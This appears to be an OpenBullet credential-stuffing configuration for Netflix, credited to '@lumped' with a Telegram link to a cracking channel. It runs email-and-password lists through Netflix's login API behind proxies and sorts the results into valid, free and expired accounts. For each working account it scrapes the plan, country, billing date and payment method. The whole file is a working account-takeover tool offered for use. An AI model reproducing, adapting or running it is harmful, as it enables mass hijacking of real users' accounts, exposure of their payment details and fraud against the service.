[SETTINGS]
{
  "Name": "Netflix(@lumped)",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-05-23T16:53:13.1651848+01:00",
  "AdditionalInfo": "https://t.me/wolfcrack",
  "Author": "@lumped",
  "Version": "1.4.5 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.netflix.com/au/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<COOKIES(flwssn)>" LR "" "" -> VAR "flwssn" 

REQUEST POST "https://api-global.netflix.com/account/auth" 
  CONTENT "email=<USER>&password=<PASS>&setCookies=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Referer: https://www.netflix.com/Login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "NetflixId\":null,\"user\":{\"" 
    KEY "Incorrect email address or password" 
    KEY "Missing password" 
  KEYCHAIN Ban OR 
    KEY "Invalid Request" 
  KEYCHAIN Success OR 
    KEY "CURRENT_MEMBER" 
  KEYCHAIN Custom "FREE" OR 
    KEY "FORMER_MEMBER" 
    KEY "NEVER_MEMBER" 

PARSE "<SOURCE>" LR "hasDvd\":" ",\"" CreateEmpty=FALSE -> CAP "Has Dvd" 

REQUEST GET "https://www.netflix.com/YourAccount" 
  
  COOKIE "flwssn: <flwssn>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/browse" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Your membership is paused." 

PARSE "<SOURCE>" LR "data-uia=\"plan-label\"><b>" "</b>" -> CAP "Plan" 

PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" -> CAP "Country" 

PARSE "<SOURCE>" LR "data-uia=\"nextBillingDate-item\">Your next billing date is " ".<" -> CAP "Billing" 

PARSE "<SOURCE>" LR "paymentMethod\":{\"fieldType\":\"String\",\"value\":\"" "\"}" -> CAP "Payment Method" 

FUNCTION Constant "@lumped " -> VAR "Config By themutualguy" 

